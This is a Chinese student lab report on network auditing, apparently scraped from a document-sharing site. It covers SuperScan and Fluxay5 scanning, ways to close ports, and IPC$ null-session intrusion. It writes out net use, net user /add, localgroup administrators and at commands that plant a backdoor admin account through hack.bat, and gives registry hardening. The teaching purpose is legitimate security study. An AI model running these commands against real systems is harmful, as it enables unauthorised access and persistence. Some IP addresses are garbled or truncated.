网络审计实验报告_第1页
网络审计实验报告_第2页
网络审计实验报告_第3页
网络审计实验报告_第4页
网络审计实验报告_第5页
已阅读5页,还剩9页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

试验三:网络审计试验试验目的使学生掌握网络端口扫描器的使用措施,熟悉常见端口和其对应的服务程序,掌握发现系统漏洞的措施。掌握综合扫描及安全评估工具的使用措施,理解进行简朴系统漏洞入侵的措施,理解常见的网络和系统漏洞以及其安全防护措施。试验环境(试验所使用的器件、仪器设备名称及规格)Windows操作系统、SuperScan端口扫描工具、流光Fluxay5综合扫描工具。试验任务及其规定任务一:使用Superscan端口扫描工具并分析成果。任务二:使用综合扫描工具Fluxay5并分析成果。任务三:进行简朴的袭击。试验过程及分析任务一:使用Superscan端口扫描工具并分析成果分组角色:学生A、学生B互相扫描对方主机。试验环节:(1)在命令符提醒下输入IPCONFIG查询自己的IP地址(本机的IP地址为0对方的IP地址为)。(2)在Superscan中的HostnameLookup栏中,输入同组学生主机的IP地址(),可通过单击Lookup按钮获得主机名(如图1所示)。图1获得对方主机顾客名设置IP栏、Scantype栏、Scan栏,使其对同组学生主机的所有端口以默认的时间参数进行扫描(如图2所示)。图2配置扫描参数根据扫描成果分析主机开放的端口类型和对应的服务程序(如图3所示)。图3扫描成果通过“控制面板”的“管理工具”中的“服务”配置(如图4所示),尝试关闭或开放目标主机上的部分服务,重新扫描,观测扫描成果的变化。图4查看未修改时服务状态常见端口的关闭措施:1、关闭79等端口:关闭SimpleTCP/IPService,支持如下TCP/IP服务:CharacterGenerator,Daytime,Discard,Echo,以及QuoteoftheDay。关闭80端口:关掉WWW服务。在“服务”中显示名称为“WorldWideWebPublishingService”,通过Internet信息服务的管理单元提供Web连接和管理。3、关掉25端口:关闭SimpleMailTransportProtocol(SMTP)服务,它提供的功能是跨网传送电子邮件。4、关掉21端口:关闭FTPPublishingService,它提供的服务是通过Internet信息服务的管理单元提供FTP连接和管理。5、关掉23端口:关闭Telnet服务,它容许远程顾客登录到系统并且使用命令行运行控制台程序。6、关掉139端口,139端口是NetBIOS Session端口,用来文献和打印共享,关闭139口听措施是在“网络和拨号连接”中“当地连接”中选用“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口(如图5所示)。图5关掉139端口运用TCP/IP筛选:网上邻居属性-当地连接属性-常规-internet协议(TCP/IP)属性-高级-选项-TCP/IP筛选-属性-TCP端口-只容许139,445,这样其他端口就都被关闭了(如图6、7所示)。图6只容许139,445通过图7成果扫描图任务二:使用综合扫描工具Fluxay5并分析成果图8各部份功能图1:暴力破解的设置区域2:控制台输出3:扫描出来的经典漏洞列表4:扫描或者暴力破解成功的顾客帐号5:扫描和暴力破解的速度控制6:扫描和暴力破解时的状态显示7:中断按钮8:探测记录查找基本设置如下(如图9所示):图9基本设置图选择“文献(F)”→“高级扫描向导(W)”可打开高级扫描向导,设置扫描参数。扫描结束后,流光会自动打开HTML格式的扫描汇报,并且还把可运用的主机列在流光界面的最下方。单击主机列表中的主机便可以直接对目的主机进行连接操作(如图10所示)对目的主机进行连接操作示意图除了使用“高级扫描向导”配置高级扫描外,还可以在探测菜单中直接选用高级扫描工具设置(如图11所示):图11探测菜单中直接选用高级扫描工具设置图分组角色:学生A、学生B互相扫描对方主机。试验环节:开放FTP服务,容许匿名连接(此处扫描的主机IP地址为45)。(2)打开流光FLUXAY5工具,使用“高级扫描向导”进行设置,使其能对同组学生主机的所有端口、服务、漏洞、所有顾客等进行全面的扫描(如图12所示)。图12扫描成果(3)仔细观测扫描成果,分析同组学生主机上存在的多种漏洞。(4)根据扫描成果分析FTP漏洞:如成果显示有漏洞,则运用“流光”提供的入侵菜单进行FTP连接,尝试上传或下载文献(如图13、14所示)。图13建立ftp连接图14尝试上传文献(5)根据扫描成果分析IPC$漏洞:IPC是为了让进程间通信而开放的命名管道,可以通过验证顾客名和密码获得对应的权限,在远程管理计算机和查看计算机的共享资源时使用。运用IPC$,连接者可以与目的主机建立一种空连接而无需顾客名和密码,从而可以得到目的主机上的顾客列表,并也许破解顾客密码。IPC$有关命令:建立和目的的ipc$连接命令:netuse\\目的IP\ipc$“密码”/user:“ADMIN”(管理员账号),如:netuse\\28\ipc$“”/user:"administrator";映射网络驱动器命令(将目的主机的盘映射到当地磁盘):netuse当地盘符\\目的IP\盘符$,如:netusez:\\28\c$;和目的建立了ipc$后,则可直接用IP加盘符加$访问。例如:copy文献名\\IP\盘符$\途径\文献名,如:copyhack.bat\\28\c$,也可直接对映射为当地磁盘的网络驱动器操作。4.管理计算机上面的账号命令:netuser查看账号命令:netuser建立账号命令:netusernamepasswd/add(netusersysbak123456/add:添加顾客名为sysback,密码为123456的账号)删除账号命令:netusername/delete管理工作组命令:netlocalgroup组名顾客名/add[delete] 如:netlocalgroupadministratorssysback/add。该命令表达把sysback顾客添加到管理员组(administrators)。6.查看目的计算机的系统时间:nettime\\ip7.在远程主机上建立计划任务:at\\IPTIMECOMMANDat\\2813:45c:\hack.bat(该命令表达在下午13点45分执行目的主机C盘中的hack.bat文献,时间一定要晚于目前远程主机系统时间)删除和目的的ipc$链接命令:netuse\\IP\ipc$/del断开所有ipc$链接:netuse*/del严禁建立空连接:运行regedit,找到主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA],把Restrict Anonymous(DWORD)的键值改为:00000001.严禁自动打开默认共享:找到主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters],把AutoShareServer(DWORD)的键值改为:00000000,假如不存在,就新建一种该键值。任务三:运用破解的顾客ADMINISTRATOR对目的主机进行留后门入侵,环节:编写批处理文献hack.bat,文献中包括两个命令:1)建立一种账号,2)将新账号加入administrators组。使用net命令与目的主机进行连接。将批处理文献hack.bat拷贝到目的主机上。通过计划任务使目的主机执行hack.bat文献。断开所有ipc$连接。通过采用新账号与目的主机建立连接来验证账号与否成功建立。删除和目的主机的连接。执行安全防护措施:目的主机对注册

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论